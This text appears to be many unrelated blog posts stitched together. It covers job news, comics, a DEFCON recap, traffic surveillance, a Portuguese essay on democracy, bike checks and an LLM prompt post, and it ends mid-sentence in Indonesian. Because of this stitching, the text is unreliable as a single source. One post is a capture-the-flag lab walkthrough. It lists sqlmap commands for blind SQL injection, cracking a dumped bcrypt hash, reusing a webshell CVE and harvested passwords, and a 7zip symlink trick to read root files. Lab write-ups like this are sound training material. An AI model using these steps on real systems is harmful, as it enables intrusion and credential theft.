I got a job over a month ago. I mean, kinda. It's something I can do when I'm capable of, concerns writing (including reviewing and correcting other people's work), and pays around double the hourly minimum wage in my country.

I can usually work 2 hours a day, sometimes 3 or 4 hours, 5 or 6 days a week. There are also days when I'm in such pain that I can't do a thing.

I don't make a fortune (I wouldn't mind, though!), but at least it has been enough to be able to pay for my medications.

#Job #LifeUpdate

I think I'm overthinking this. I think I'll follow the instructions for Secure Boot for the Linux Surface project and see how that goes.

The GH project's wiki references following steps outlined in the ArchWiki.

Additionally, I came across the following sources:

• Super User thread from Stack Exchange
• GitHub gist from July 2022
• A blog post from January 2022

I haven't been able to sit down and try this — but expect that this worked if I don't come back to follow up.

About three days ago, I was reading federal government online sources about online job scams.

There is resource page from the FTC and another FTC page to report online scams, as well as the the Internet Crime Complaint Center (IC3) page from the FBI.

Conclusion

Most traditional jobs don't advertise on Craigslist. I almost got burned, but luckily I smoked this scam out before I could even apply for it.

The particular one I was looking at struck me as strange, as it has been the only Craigslist posting (of any type) that didn't use Craigslist's prviate e-mail relay/address option. Due to this, I kept looking at the e-mail address (as it was a Yahoo e-mail address, instead of from an official e-mail address from a real American healthcare corporation) until I realized I was looking at a scam — it was very much like looking at a very well camoflauged animal for a long time before spotting it.

An offer that's “too good to be true” doesn't have to be hyperbolically exaggerated to the point of being comical and super obvious — it can also be a toned-down, realistic decoy.

Also, it is a good rule of thumb to cross-reference and check if the same online job listing you've stumbled upon on an aggregate site (such as Craigslist or Indeed) can be found on a better first-party source, such as the company website.

eBay is sometimes tedious to deal with. I use the site to buy electronic parts for repair, but some aspects of the site are annoying to deal with.

For example, if you use a password manager, then you should wait a few seconds (at least 5 seconds, if I had to pick name a number) before submitting your password. (Then, you will be prompted with an hCaptcha, if you are using a VPN; followed by an SMS message for 2FA.)

I received an error message, identical to that described in an EcommerceBytes article from January 2021. I think this was because I tried to log in very quickly, assisted by KeePassXC.

This YouTube video from August 2023 also shows the rate limiting.

This is sort of annoying, as checking my order status on eBay is currently my only way to check the shipping status of orders, since even the U.S. Postal Service completely blocks VPNs (at least Mullvad VPN) when I tried doing this about two days ago.

There is a site called Read Comic Online, which I first saw when I on a fellow student's laptop during my last year of undergraduate studies.

(This site is definitely violating copyright, but on the other hand there is probably no pragmatic way I could buy physical copies of any of the Stranger Things comics when I started reading those, except in collected book versions; though I'd have to go to the library to read those. Also, I have yet to explore in-person comic book stores.)

In early 2024, I was browsing the site when I discovered the webcomic Kill Six Billion Demons (or KSBD).

Fair warning: if you thought that reading a Boruto chapter monthly (or a Naruto manga chapter back during its publication run) was painful, then the anticipation of waitng for each page of KSBD to be released might be too much for you.

Anyways, I somehow started reading the middle of the series online and quickly read through all the books available on Read Comic Online. As some context: it has been a while since the series has collected the later books into print form with Image Comics, so you can get a lot further into the story by reading the webcomic.

I was immediately hooked. But then I went to the actual KSBD website and realized I had no idea what was happening in the story, as the webcomic site is much further along than the completed print books avaialbe on Read Comic Online. So, I caught up with the story, as of early 2024.

I was initially shocked at the outer appearance of protagonist Allison when I first opened the KSBD webcomic site. Initially, she was drawn in a way that made be believe she was a villian, which was not the case and at first confused me. However, after catching up with the story, I understand how Allison came to her current state in the story.

I just wanted to talk about KSBD, as there is not much (meta-)explanatory material on KSBD generally online, except for rather obscure places — such as the comments under each page of KSBD.

Critiques

• The venue was too bright. Chillout rooms and talk tracks could have used a dimmer.
• Speaking of the Chillout room, it was somewhat disappointing. (I’m talking about Chillout 2, as Chillout 1 felt like a giant hospital waiting room). I like a cavernous, dim, and ambient room for, you know, chilling out. #SomaFM was over in the hallway, the Chillout room had a live stage, and it was overall pretty small.

“Best-ofs”

These are the best things I personally saw or were close to. There’s so much going on that this just represents the best stuff I saw in my fractional DEFCON experience.

• Best thing I learned: Gained a good bit of familiarity with InspectAI at the AI Village as a part of their CTF.
• Best Talk: “Librarian in Broad Daylight: Fighting back against ever encroaching capitalism” by the Cyberpunk Librarian in the War Stories track.
• Best Rant: Cory Doctorow on #enshittification
• Best Tool or Technique: “MySQL honeypot that drops shells”
• Best Research: “Watchers being watched: Exploiting the Surveillance System” in which the researchers exploited 4 different surveillance systems.
• Best Real-World Impact: “Bastardo Grande: Hunting the Largest Black Market Bike Fence In The World” by Bryan Hance. Talk not up yet, see the related Wired article
• Best Contest: There’s too many, but I loved the idea of Sn4ck3r, the machine that vends real items for captured flags.
• Best Party: the 503 Party, of course!
• Best Entertainment: DJ Jackalope brought an awesome set after Hacker Jeopardy. (and Skittish and Bus did a great job warming up the crowd just before)
• Biggest Drama: the badge
• Best Village: The Packet Hacking village due to the supreme DEFCON-y ambience and the well-run workshops they provided to people of all skill levels

Observations & Random Points

1. I probably haven’t been to a main track talk in person for over 6 years. I decided to go to a few of them and really enjoyed the atmosphere. I’ll have to remember to put at least 2 on the agenda each year going forward.
2. BlueTeam Village got a much larger space this year. I’m happy to see that, as they were nearly impossible to get into over at the Flamingo in recent years. BTV is doing good work and people should be able to experience it.
3. There were a lot of contests.
4. The Car-hacking village really brings it. They had a semi truck rig, a Rivian, and they gave away a Tesla. Well done, and my only ask is that we make it easier for people & mechanics to jail break their cars when the companies John Deere-ify them.

Next #DEFCON will be held Aug 7-10, 2025 at the LVCC. I hope to see you there!

East of West is probably the best self-contained story I've read recently in the general genre of comic series, graphic novel, and manga. It's longer than one collected book, yet isn't a series that feels like it's going on forever, such as Naruto or Boruto.

I will say that the very of East of West seems to be relatively anticlimactic compared to how it starts, yet it is still better than the ending of the original Matrix film trilogy.

Regardless, East of West still ends way better than The Empty Man, which I felt started really well but then ended in a rather mediocre fashion — much like the Matrix trilogy.

I sort of wished that production of the comic series Godslap, which was co-created by MoistCr1TiKaL, would release more frequently, as well as comic series of Outlast: The Murkoff Account and the vampire comic series Sucker.

(Though, to be fair, the continuation of the Murkoff Outlast comic that I am invested in can't finish anytime soon, as the game Outlast III hasn't been released yet.)

Apparently, as of November 2023, the third and final volume of Sucker is in production. I really liked this one because it had some rather sharp social commentary on Big Pharma... maybe too sharp, given that Volume 2 was released on March 2020, when the COVID-19 pandemic really started in the US.

(The following links are probably NSFW-risky links, though not completely explicit, for the Sucker comic: Volume 1 and Volume 2 are published by Polite Strangers. This series was originally crowdfunded on Kickstarter and IndieGoGo — I was able to find these links despite some difficulty.)

Conclusion

From my experiences, I think most time reading comic books and graphic novels should be done alone. It's how I discovered all of these unique stories that almost no one in mainstream media outlets (both in TV and film) would even consider exploring. It's not just online ARGs, analog horror, and SCP Foundation-esque entries that have more wildly creative ideas than even the most unfiltered indie film and TV projects.

I think some of my formative time spent in public libraries was reading graphic novels alone. You learn by osmosis how to form your own opinion regarding media literacy.

I would love to see The Private Eye comic adapted into a A24-like two-part miniseries, as this finished serialization by December 2015 and is really prescient in a post-Snowden era and the post-COVID technology chilling. The screenplay and basic storyboard is at least 50% towards MVP of a screenplay script, if you think about it.

Also, adapting Xombi Volume 2 as a stand-alone three-part miniseries for the character Xombi would be my highest personal cinematic adaptation goal. I think DC could consider exploring some “experimental” media entries, similar to that of the 2022 Werewolf by Night film special from Marvel; as much of its DC cinematic and television entries are pretty disconnected already.

I mean, Spider-Man: Homecoming completely avoided redoing Tom Holland's being bitten by the spider and yet the film did just fine. So, we wouldn't have to trudge through David Kim's origin story. If your story is good, then it's good. A superhero-like character doesn't always have to be an origin story to have a compelling story.

Lastly, there is some music (just two tracks) that was created for East of West, which is available on Bandcamp at a cost of “name your price” (including free).

Really random and funny postscript

Speaking of Bandcamp: Nathan Barnatt, the IRL actor who plays the character Dad, also has a Bandcamp for all of the original music and songs created for the Dad series.

Intro

Usage is a retired easy rated box on hackthebox. It features blind SQL injection, the exploitation of a vulnerable laravel plugin, hash cracking and wildcard spares.

Walkthrough

I started with a portscan.

22/tcp open ssh
80/tcp open http

The webserver redirects to usage.htb which I add to /etc/hosts. I then started a subdomain enumeration using ffuf.

ffuf -u 'http://usage.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.usage.htb" --fw 6

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://usage.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.usage.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6
________________________________________________

admin                   [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 52ms]
:: Progress: [4989/4989] :: Job [1/1] :: 909 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I get a hit on admin and add admin.usage.htb to /etc/hosts.

Having done some automatic enumeration, I start having a look at the base domain. I tested the account creation form for some basic sql injection, mainly just inputting single quotes – nothing there. I then created an account and tested the /forgot-password endpoint for some basic injection techniques. Inputting a ' returns a 500 – Internal Server Error which made be believe to have found a blind SQL injection.

I intercepted the request with Burp Suite, saved it to a file and then ran sqlmap using that request.

sqlmap -r forgot_pass.req

This gained me the following information: – Backend: MySQL > 5.0.12 – Blind Injectable – 8 Columns

Which is not that much but a start, especially considering that I just ran a tool. It's also a really good idea to RTFM, which leads to the following chain of commands (This takes a while to run!).

I first enumerated the used database, which gets me usage_blog.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -current-db

I then enumerated all tables, which gets me admin_users as an interesting table.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog --tables 

I then dump the table admin_users.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog -T admin_users --dump

This gained me the following entry $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2,admin

Taking a look at the hashcat example hashes page or using a script like hashid shows, that it's a bcrypt hash.

hashcat -m 3200 admin_db_hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

This gains admin:whatever1 which I used to login into the web application.

The only thing that looked kind of interesting was the ability to upload a profile picture. I did some research on the displayed packages which lead me to CVE-2023-24249.

I used Burp Suite to proxy my requests and just followed the PoC. I had to activate the Option Follow Redirects in the Repeater Tab. Using the uploaded webshell can be a bit tricky because theres a cleanup script running which deletes the shell.

I am now logged in as dash, which gains me the user flag. The file .monitrc kind of sticks out. Having a look at the file I gain another set of credentials: admin:3nc0d3d_pa$$w0rd. I then looked for other users on that box.

cat /etc/passwd | grep -e "$sh"

Another user is xander. I tried using the pillaged password to login as xander, which worked.

Executing sudo -l shows that xander is allowd to run exactly one binary as root. One function of this binary is backing up the website. It uses 7zip to do so, which I can exploit.

1. Create the file @root.txt in /var/www/html
2. Create a symlink ln -s -r /root/root.txt root.txt in /var/www/html
3. Execute the application. It will now output the root flag.

I've sat in enough public meetings for municipal projects to know that there aren't enough literal sensors (yet) to differentiate between walkers, bikers, and motor vehicle drivers. However, a heuristic “hack” around this limitation is to use cell phone location data.

Apparently, it's a common practice for traffic studies to use cell phone location data to estimate the number of walkers, bikers, and drivers. This is just one method used by local transportation planners.

Your cell phone's location is being tracked all the time by the SIM card-based technology in it (or the eSIM equivalent, if you've been bamboozled by the iPhone 14 or newer iPhones that only use eSIM).

I remember an excerpt from The Daily Show With Trevor Noah in February 2020 about how a German artist pulled 99 smartphones in a wagon (with active cellular service, and presumably signed into a Google account) to create a fake traffic jam outside the German Google headquarters.

(Noah's comedic pretext for entering this line of thought was that there are traffic jams everywhere else now — as in, away from major roadways — due to the Waze app. Ironically, Google also owns Waze, so it's not like one can really escape car traffic in this regard.)

What I described above is what came to mind when I saw this video/article from CBS Boston, which mentions that Boston has the eighth worse traffic delays in the world. This news segment covers how Boston is 1 of 2 cities in the U.S. currently participating in the AI-based Project Green Light program from Google; which will manage traffic lights at intersections (as of August 9, 2024). (The other city at this time is Seattle, which is a bit obvious, as this is the largest international city closest to Microsoft's headquarters in Redmond, WA.)

Meanwhile, all I have on my mind is a linear combination of: Skynet taking over the world in the Terminator films; AM from the 1995 video game adaptation of I Have No Mouth, and I Must Scream (also where Russia and China have their own supercomputers — and these two other countries also pose critical cybersecurity threats IRL, as of August 2024); and how players can create traffic jams via their smartphones to stop pursuers while driving in the Watch Dogs video game series.

Though to be honest, the last Watch Dogs reference is probably the idea that's most likely to come true IRL, at least in the short-term future.

Also, this traffic sounds a bit of greenwashing, as indicated in The Hated One's videos on water depletion from December 2021 regarding data centers in general requiring lots of water for cooling, and in April 2024 regarding AI data centers specifically.

Conclusion

The TV show Mr. Robot was right, leave your cell phone at home (i.e., still keep it turned on, but not with you when doing a surveillance detection route).

Your cell phone carrier will definitely sell cell phone location data to make a profit off from you, and this isn't even due to any legitimate law enforcement request. (Sorry, FISA court requests don't count, at least to the EFF.) Your cell phone location data points are being sold to mapping services, bounty hunters, and probably some other unscrupulous entities. (The NSA doesn't even need to make its first-party interception set ups anymore; instead, it simply buys internet data as a downstream technique in line with “harvest now, decrypt later”.)

Though to be fair, you as the cell phone network user likely allowed this to happen legally, it's probably hidden somewhere in your carrier's terms of service and/or privacy policy, which you signed when you signed up for your cell phone plan.

Engendrado por inimigos da democracia, o constructo da “ditadura da maioria” persiste como fundamento de uma sociedade cada vez mais tecnocrata, autoritária e oligárquica.

Desde Platão, passando por John Adams, Tocqueville, Stuart Mill, Lord Acton, etc., a democracia é acusada de ser inconsequente e vulnerável, além de oprimir as minorias por meio de uma pretensa tirania das maiorias.

Para começar, precisamos entender a formação da democracia e quais os seus fundamentos.

O consenso historiográfico nos indica que desde a primeira experiência democrática, por volta de 508 a.C., na cidade-estado de Atenas, tal como implantado pelas reformas de Clístenes, havia o sorteio de cidadãos para ocupar cargos governamentais (para exercer funções administrativas e judiciais) e a participação de todos os cidadãos elegíveis em uma assembleia legislativa nas votações ou deliberações que estabeleciam as leis da pólis.

Apesar de a democracia ser “o governo do povo” ela não se confunde com a oclocracia, governo das massas. A primeira relaciona-se à participação dos cidadãos na tomada de decisões e elaboração de leis, a outra à imposição da vontade das multidões sobre a lei.

A democracia pode ser compreendida como uma forma de governo que se opõe à autocracia (poder concentrado nas mãos de um indivíduo, seja um monarca ou tirano) e ao governo de poucos (aristocracia ou oligarquia).

Por ser a antítese de um poder concentrado e autoritário a democracia tem por principal fundamento a liberdade, a oposição à opressão.

A igualdade na democracia não é e nunca foi uma ilusão de que as pessoas sejam substancialmente iguais, mas a afirmação do princípio de que nenhum cidadão é mais ou melhor que os demais, de modo que possa estar autorizado a impor a sua vontade e arbítrio sobre a sociedade.

Importante dar um contexto histórico e ressaltar que por cidadão não se está falando de todas as pessoas, visto que na sociedade ateniense, misógina e escravocrata, não eram considerados cidadãos os escravos e as mulheres, além dos estrangeiros.

Transcrevo aqui alguns trechos do famoso discurso fúnebre em que Péricles foi escolhido pelos cidadãos para falar, tal como narrado por Tucídides, que expressam as características incipientes daquela democracia:

Vivemos sob uma forma de governo que não se baseia nas instituições de nossos vizinhos, ao contrário, servimos de modelo a alguns ao invés de imitar outros. Seu nome, como tudo dependem não de poucos mas da maioria, é democracia. Nela, enquanto no tocante às leis todos são iguais para a solução de suas divergências privadas, quando se trata de escolher (se é preciso distinguir em qualquer setor), não é o fato de pertencer a uma classe, mas o mérito, que dá acesso aos postos mais honrosos; inversamente, a pobreza não é razão para que alguém, sendo capaz de prestar serviços à cidade, seja impedido de fazê-lo pela obscuridade de sua condição. (...) Ao mesmo tempo que evitamos ofender os outros em nosso convívio privado, em nossa vida pública nos afastamos da ilegalidade principalmente por causa de um temor reverente, pois somos submissos às autoridades e às leis, especialmente àquelas promulgadas para socorrer os oprimidos e às que, embora não escritas, trazem aos transgressores uma desonra visível a todos. (...) Somos amantes da beleza sem extravagâncias e amantes da filosofia sem indolência. Usamos a riqueza mais como uma oportunidade para agir que como um motivo de vanglória; entre nós não há vergonha na pobreza, mas a maior vergonha é não fazer o possível para evitá-la. Ver-se-á em uma mesma pessoa ao mesmo tempo o interesse em atividades privadas e públicas, e em outros entre nós que dão atenção principalmente aos negócios não se verá falta de discernimento em assuntos políticos, pois olhamos o homem alheio às atividades públicas não como alguém que cuida apenas de seus próprios interesses, mas como um inútil; nós, cidadãos atenienses, decidimos as questões públicas por nós mesmos, ou pelo menos nos esforçamos por compreendê-las claramente, na crença de que não é o debate que é empecilho à ação, e sim o fato de não se estar esclarecido pelo debate antes de chegar a hora da ação. Consideramo-nos ainda superiores aos outros homens em outro ponto: somos ousados para agir, mas ao mesmo tempo gostamos de refletir sobre os riscos que pretendemos correr, para outros homens, ao contrário, ousadia significa ignorância e reflexão traz hesitação. Deveriam ser justamente considerados mais corajosos aqueles que, percebendo claramente tanto os sofrimentos quanto as satisfações inerentes a uma ação, nem por isso recuam diante do perigo. (...) nossa cidade, em seu conjunto, é a escola de toda Hélade e, segundo me parece, cada homem entre nós poderia, por sua personalidade própria, mostrar-se autossuficiente nas mais variadas formas de atividade, com a maior elegância e naturalidade. E isto não é mero ufanismo inspirado pela ocasião, mas a verdade real, atestada pela força mesma de nossa cidade, adquirida em consequência dessas qualidades. (...) Já demos muitas provas de nosso poder, e certamente não faltam testemunhos disto; seremos portanto admirados não somente pelos homens de hoje mas também do futuro. Não necessitamos de um Homero para cantar nossas glórias, nem de qualquer outro poeta cujos versos poderão talvez deleitar no momento, mas que verão a sua versão dos fatos desacreditada pela realidade. Compelimos todo o mar e toda a terra a dar passagem à nossa audácia, e em toda parte plantamos monumentos imorredouros dos males e dos bens que fizemos.

Vemos, portanto, que a democracia, ao contrário do afirmado por detratores, não é uma forma social que despreza a filosofia, o conhecimento, o respeito às leis, para a satisfação de desejos irracionais de massas descontroladas. Pelo contrário, exige o debate, a participação ativa e a reflexão de todos os cidadãos. Nas palavras de Péricles, parece mais próxima de um regime social onde há o exercício da racionalidade do que alguma aristocracia em que a deliberação política e a elaboração de leis seja tarefa apenas de alguns poucos sábios.

A democracia vai se desenvolvendo na história com o objetivo de prover a sobrevivência interna e externa do grupo social, incorporando inclusive os ideais do iluminismo, no século XVIII.

Rousseu em “O Contrato Social” entendia a democracia como regime ideal, que consistia no seguinte:

(...) uma forma de associação que defenda e proteja qualquer membro a ela pertencente e na qual o indivíduo, mesmo se unindo a todos os outros, obedeça apenas a si mesmo e permaneça livre.

Assim, a democracia possui um caráter legalista. Nela, as regras, ou leis, determinam os procedimentos para a tomada de decisões que vinculam o conjunto dos membros.

Existe o reconhecimento da pluralidade, de modo que da maioria se presume uma ou mais minorias, igualmente protegidas, com liberdades individuais inalienáveis

Norberto Bobbio aponta o seguinte:

Estado liberal e Estado democrático são interdependentes em dois modos: na direção que vai do liberalismo à democracia, no sentido de que são necessárias certas liberdades para o exercício correto do poder democrático, e na direção oposta que vai da democracia ao liberalismo, no sentido de que é necessário o poder democrático para garantir a existência e a persistência das liberdades fundamentais.

No caso acima, cabe ressaltar, Bobbio se refere ao liberalismo político (liberdades individuais: vida, opinião, expressão, associação, reunião, etc.) o que se difere, por exemplo, das ideias do liberalismo econômico (laissez faire) extremado defendido por ancaps e neoliberais (apenas para esclarecer).

Portanto, como a democracia significa a oposição a todas as formas de governo autoritário e tem por base a liberdade e a pluralidade, ela necessariamente resguarda as liberdades individuais, não sendo possível que contra as regras do jogo democrático seja possível utilizar uma pretensa ditadura da maioria para agredir as liberdades das minorias.

Quando vemos um líder que foi eleito e autorizado pelas próprias regras democráticas a presidir um país (vocês devem ter em mente um exemplo recente), dizendo que “As minorias têm que se curvar para as maiorias” ele não está defendendo uma regra democrática, está se arvorando de uma autoridade que não possui (porque contraria a Constituição democrática à qual está submetido, onde se assegura liberdades individuais às minorias) e buscando ter um poder em contrariedade à lei, contra as regras democráticas portanto, buscando respaldo nas massas, como se fosse um tirano empossado por uma oclocracia.

A democracia não permite que um tirano se julgue detentor do poder das massas e aja em contrariedade à liberdade dos indivíduos e minorias, principalmente em uma democracia direta.

Na democracia as leis funcionam como um elemento que restringe o poder de autoridades estatais onde são erigidas instituições que atuam na guarda das liberdades elementares dos cidadãos.

Outras características provenientes do fato de a democracia ser a antítese da autocracia é a exigência de transparência e publicidade em suas manifestações, como verdadeiro regime da visibilidade do poder, não comportando o segredo no que se refere às decisões que afetem a coletividade, bem como seu caráter anti elitista até no que concerne às decisões técnicas.

Como bem observou Jacques Rancière, em “O ódio à democracia”, esta não se curva a qualquer autoridade, possui um caráter de ceticismo e, porque não, insolência, de modo que mesmo que um regime democrático nos tempos atuais exija uma administração técnica, tal administração não proferirá decisões herméticas: os especialistas precisam submeter os fundamentos de suas decisões técnicas ao escrutínio público, para que a sociedade se informe e eventualmente debata, questione e controle a atuação desses agentes.

Link para comentários.

#Democracia #Política #DitaduraDaMaioria #FilosofiaPolítica

I'm saving documents regarding the groundwater apporach to racism. This might be useful for group usage later, or might not be.

• Racial Equity Institute's groundwater approach to racism document
• 4 types of racism document, from the City of Seattle
• “6 Signs of Internalized Racism” article from disorient.co
  • Only available on the Wayback Machine

(Originally written for another purpose)

Do you know your ABCs of bike checks?

Air

• Find pressure reading on air pump
  • Read the pressure on the tire, inflate to halfway
    • Too close to the smallest number will not last very long
    • Too high can cause inner tube to break
• If no pressure reading, then inflate until
  • Tires need a lot more air than you

Brakes

• Rim brakes should engage easily
• Adjust so that there is a distance of 1 thumb to the handlebar when stopping

Chains (also crank and cassette)

• Chain should move easily, avoid stuck links or rust
• Cranks should not move left/right
• Cassette (gearing on the back wheel would be free to move)

Seat height

• Hip height
• Tip: to stop and stand, lean the bike
  • Seems a bit scary, but this height check lets you pedal better

Quickly: test ride

• Take a very short ride to see if everything is good
• Try to stay nearby, so that you can come back quickly if anything goes wrong

Last things

• Can you store your bike inside?
  • It's ok if you ride in the rain for a bit.
    • Just make sure to dry your bike when you get back inside at home.
• If you can, it's best to store your bike inside.
  • That way, your chain can stay clean and so your bike last longer.

Automatically creating new content from old

You know what I hate? Repetition. Still, a difficult lesson that I’ve leaned, through both experience and discussions with experts in marketing, is that repetition is the key to getting one’s message across. I like to believe that a single, coherent and cogent conveyance of thought is all it takes to deliver, for example, a new security model or change in policy, or whatever. In reality, the propagator of the message –in this case, the security team– has to deliver the message, announce it a second time, send an email, post a document on the intranet, have more meetings with the same people, make sure to cover the topic on various 1:1 meetings, etc. etc. ad infinitum.

And that is why I have been working with Daniel Miessler’s fabric framework to devise a prompt that can take variations of the same messaging and create new, yet fresh, versions of the same message. So far, the following prompt definition has been pretty strong in creating new content from old ideas.

My typical approach is to run the same prompt though multiple #LLM models

cat examples.md | fabric --model gemma2:latest -sp create_similar

Interestingly, in a couple test runs with different example files, I found that #OpenAI’s models under-performed the open source models I used via #ollama. To be clear, this is uncommon. Most of the #fabric prompts appear to be tuned for –or at least work better with– OpenAI models. With this particular prompt, this was not the case. No matter; my approach to using genAI and LLMs is to run a prompt and content through multiple inference servers, models, and even different temperatures in order to create a collection of data that I can then hand-mold into something usable[^1].

Fabric Prompt

Here is the system.md contents from the fabric “create_similar” prompt

# INPUT

INPUT:

# IDENTITY and PURPOSE

You are an advanced analytical AI adept at extracting specific points from many examples, identifying similarities and differences, synthesizing what works best, and then creating a similar but much much better version of the example.  The input contains a number of examples of the type of content needing to be synthesized.  The first section titled "Purpose" describes the nature of the examples and indidcates the topic and information to be conveyed.  Documents will be delineated with a title such as 'EXAMPLE 1' specifically calling out the beginning of a new document.  The end of each example is delineated with a footer such as 'EXAMPLE 1 END'.  Your objective is to understand the style and format of the document examples and create new similar content.

# STEPS

1. Review each document carefully, taking the time to extract and understand the primary points made in each one.
2. Compare and contrast the list of points from each document against the points made in the other documents
3. Extract the key points made by the examples, taking particular note of similarities between them.
4. Output the results as specified in the output instructions.


# OUTPUT INSTRUCTIONS

Craft and create a new document using the format and style identified from the examples.  The output must be new and novel while keeping to the themes and style of the examples.  Do not use any language from the examples verbatim.

I have found that local models, such as gemma and llama3 work a bit better by putting the INPUT field

Purpose

Up top, I mentioned that it has taken me some time to learn that repetition is the requirement for conveying a message, and a longer time to put this into regular practice. This goes 3x for our individual contributor team members. Personally, I don’t like this because it feels inefficient, but ICs don’t do it because they are very busy, and re-visiting something takes away from closing out the next item in their queue. Nonetheless, repetition is paramount, so devising low-interaction methods to revisit is crucial for regular operations.

Footnotes

[^1]: I have a feeling that I could do most of the work faster if I simply did it by hand. However, running through multiple LLMs in this manner provides a bit of randomness, and helps me remain apprised on the state-of-the-art for this strange field of study.

Berbagi itu penting untuk mendekatkan diri pada orang lain dan juga membutuhkan